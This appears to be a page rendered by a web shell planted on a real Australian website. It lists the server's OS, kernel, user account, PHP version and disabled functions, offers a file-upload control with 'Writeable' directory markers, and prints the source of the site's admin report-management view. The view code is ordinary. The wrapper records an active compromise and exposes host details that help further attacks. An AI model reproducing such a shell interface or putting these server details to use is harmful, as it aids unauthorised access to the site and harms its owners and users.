https://t.me/RX1948
Server : Apache/2.4.18 (Ubuntu)
System : Linux canvaswebdesign 3.13.0-71-generic #114-Ubuntu SMP Tue Dec 1 02:34:22 UTC 2015 x86_64
User : oppastar ( 1041)
PHP Version : 7.0.33-0ubuntu0.16.04.15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Directory :  /proc/self/root/var/www/iatax.com.au/public_html/application/views/admin/reports/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/self/root/var/www/iatax.com.au/public_html/application/views/admin/reports/index.php
<div class="row">
  <div class="col-sm-12">
       <p><a href="<?= base_url('admin/dashboard'); ?>"><i class="fa fa-arrow-left" aria-hidden="true"></i> Back to Dashboard</a></p><br>
      <h2>Report Administration</h2>
      <?= $this->session->flashdata('success'); //to display success message ?> 
      <?= $this->session->flashdata('result'); //to display result message ?> 
  </div>
</div>   

<?= form_open_multipart(); ?>   
<div class="row">
  <div class="col-sm-3">
      <h4>Landing Page Banner</h4> 
      <p>Banner Image<br>
      <?php if (!empty($report_landingpage->report_landingpage_image)) : ?>
          &nbsp;&nbsp;<img style="width:200px; height:auto;" src="<?= base_url() . 'uploads/report/' . $report_landingpage->report_landingpage_image; ?>"  alt="" />
          <br><i class="fa fa fa-trash-o" aria-hidden="true"></i> <a href="<?= base_url() . 'admin/reports/delete_landingpage_image'; ?>">Delete</a>
      <?php endif; ?></p>  
  </div>
   <div class="col-sm-9">
      <input required type="file" name="userfile" size="20" class="btn btn-default btn-file form-control" /> 
      <span style="font-size:12px; font-style: italic;">Image size must be max of 1600  pixel width. 460 pixel height, jpg/png, max 300KB</span>
      <span style="color:#F7931E;"><?php echo form_error('userfile'); ?></span>
      <?php echo $this->session->flashdata('banner_error'); //to display error message ?> 
      <br />
      <br />
      <input class="btn btn-primary" name="landing_image" type="submit" value="UPDATE IMAGE">
  </div>
</div>  
<?= form_close(); ?>   
  
<div class="row">
  <div class="col-sm-12">
      <br>
      <p><?= anchor('admin/reports/add', '<i class="fa fa-plus" aria-hidden="true"></i> <strong>ADD A NEW REPORT</strong>'); ?></p> 
  </div>
</div>    

<div class="row">
  <div class="col-sm-12">
      <table class="table table-striped"> 
  <thead>
      <tr>
          <th>Report Title</th>
          <th>Year</th>
          <th>Ordering</th>
          <th>Edit</th>
          <th>Delete</th>
      </tr>
  </thead>
  <tbody>
    <?php if(count($reports)) : ?> 
      <?php foreach($reports as $report): ?>
        <tr>
            <td><?= ucfirst($report->title_ind); ?></td>
              <td><?= $report->year; ?></td>
              <td><?= $report->priority; ?></td>
              <td><?= bt_edit('admin/reports/edit/' . $report->id); ?></td>
              <td><?= bt_delete('admin/reports/delete/' . $report->id); ?></td>
          </tr>
      <?php endforeach; ?>
      <?php else: ?>
        <tr>
          <td colspan="3">We could not find any report.</td>
          </tr>
      <?php endif; ?>
  </tbody> 
  </table>
  </div>
</div>  

<div class="row">
  <div class="col-sm-12">
      <?php
      //create pagination...
      echo '<div style="text-align:center;">' . $this->pagination->create_links() . '</div>';
      ?>
  </div>
</div> 

https://t.me/RX1948 - 2025